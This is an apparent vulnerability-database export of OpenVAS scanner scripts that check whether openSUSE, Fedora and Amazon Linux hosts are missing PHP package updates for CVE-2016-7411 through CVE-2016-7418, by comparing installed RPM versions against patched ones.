script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-15 05:53:02 +0200 (Sat, 15 Oct 2016)\");\n script_cve_id(\"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\",\n \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for php5 (openSUSE-SU-2016:2540-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php5'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for php5 fixes the following security issues:\n\n * CVE-2016-7411: php5: Memory corruption when destructing deserialized\n object\n\n * CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG\n in BIT field\n\n * CVE-2016-7413: Use after free in wddx_deserialize\n\n * CVE-2016-7414: Out of bounds heap read when verifying signature of zip\n phar in phar_parse_zipfile\n\n * CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n\n * CVE-2016-7417: Missing type check when unserializing SplArray\n\n * CVE-2016-7418: Null pointer dereference in php_wddx_push_element\n\n This update was imported from the SUSE:SLE-12:Update update project.\");\n\n script_tag(name:\"affected\", value:\"php5 on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:2540-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5-debuginfo\", rpm:\"apache2-mod_php5-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath-debuginfo\", rpm:\"php5-bcmath-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2-debuginfo\", rpm:\"php5-bz2-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar-debuginfo\", rpm:\"php5-calendar-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype-debuginfo\", rpm:\"php5-ctype-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl-debuginfo\", rpm:\"php5-curl-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba-debuginfo\", rpm:\"php5-dba-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debuginfo\", rpm:\"php5-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debugsource\", rpm:\"php5-debugsource~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom-debuginfo\", rpm:\"php5-dom-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant\", rpm:\"php5-enchant~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant-debuginfo\", rpm:\"php5-enchant-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif-debuginfo\", rpm:\"php5-exif-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi-debuginfo\", rpm:\"php5-fastcgi-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo\", rpm:\"php5-fileinfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo-debuginfo\", rpm:\"php5-fileinfo-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-firebird\", rpm:\"php5-firebird~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-firebird-debuginfo\", rpm:\"php5-firebird-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm\", rpm:\"php5-fpm~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm-debuginfo\", rpm:\"php5-fpm-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp-debuginfo\", rpm:\"php5-ftp-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd-debuginfo\", rpm:\"php5-gd-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext-debuginfo\", rpm:\"php5-gettext-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp-debuginfo\", rpm:\"php5-gmp-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv-debuginfo\", rpm:\"php5-iconv-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap-debuginfo\", rpm:\"php5-imap-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl\", rpm:\"php5-intl~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl-debuginfo\", rpm:\"php5-intl-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json-debuginfo\", rpm:\"php5-json-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap-debuginfo\", rpm:\"php5-ldap-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring-debuginfo\", rpm:\"php5-mbstring-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt-debuginfo\", rpm:\"php5-mcrypt-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql\", rpm:\"php5-mssql~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql-debuginfo\", rpm:\"php5-mssql-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql-debuginfo\", rpm:\"php5-mysql-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc-debuginfo\", rpm:\"php5-odbc-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-opcache\", rpm:\"php5-opcache~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-opcache-debuginfo\", rpm:\"php5-opcache-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl-debuginfo\", rpm:\"php5-openssl-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl-debuginfo\", rpm:\"php5-pcntl-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo-debuginfo\", rpm:\"php5-pdo-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql-debuginfo\", rpm:\"php5-pgsql-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar\", rpm:\"php5-phar~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar-debuginfo\", rpm:\"php5-phar-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix-debuginfo\", rpm:\"php5-posix-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell-debuginfo\", rpm:\"php5-pspell-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline-debuginfo\", rpm:\"php5-readline-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop-debuginfo\", rpm:\"php5-shmop-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp-debuginfo\", rpm:\"php5-snmp-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap-debuginfo\", rpm:\"php5-soap-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets-debuginfo\", rpm:\"php5-sockets-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite-debuginfo\", rpm:\"php5-sqlite-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin-debuginfo\", rpm:\"php5-suhosin-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg-debuginfo\", rpm:\"php5-sysvmsg-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem-debuginfo\", rpm:\"php5-sysvsem-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm-debuginfo\", rpm:\"php5-sysvshm-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy-debuginfo\", rpm:\"php5-tidy-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer-debuginfo\", rpm:\"php5-tokenizer-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx-debuginfo\", rpm:\"php5-wddx-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader-debuginfo\", rpm:\"php5-xmlreader-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc-debuginfo\", rpm:\"php5-xmlrpc-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter-debuginfo\", rpm:\"php5-xmlwriter-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl-debuginfo\", rpm:\"php5-xsl-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip-debuginfo\", rpm:\"php5-zip-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib-debuginfo\", rpm:\"php5-zlib-debuginfo~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.5.14~62.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:44", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-09-28T00:00:00", "type": "openvas", "title": "Fedora Update for php FEDORA-2016-62fc05fd68", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7412"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310809422", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809422", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2016-62fc05fd68\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809422\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-28 06:03:21 +0200 (Wed, 28 Sep 2016)\");\n script_cve_id(\"CVE-2016-7418\", \"CVE-2016-7417\", \"CVE-2016-7416\", \"CVE-2016-7414\", \"CVE-2016-7413\", \"CVE-2016-7412\", \"CVE-2016-7411\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for php FEDORA-2016-62fc05fd68\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"php on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-62fc05fd68\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HCPYXRCCP6O73RVWR5XSFZK2TBUYIY3M\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.6.26~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T22:55:39", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2016-10-26T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-753)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7412"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120742", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120742", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120742\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:27 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-753)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in PHP. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update php56 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 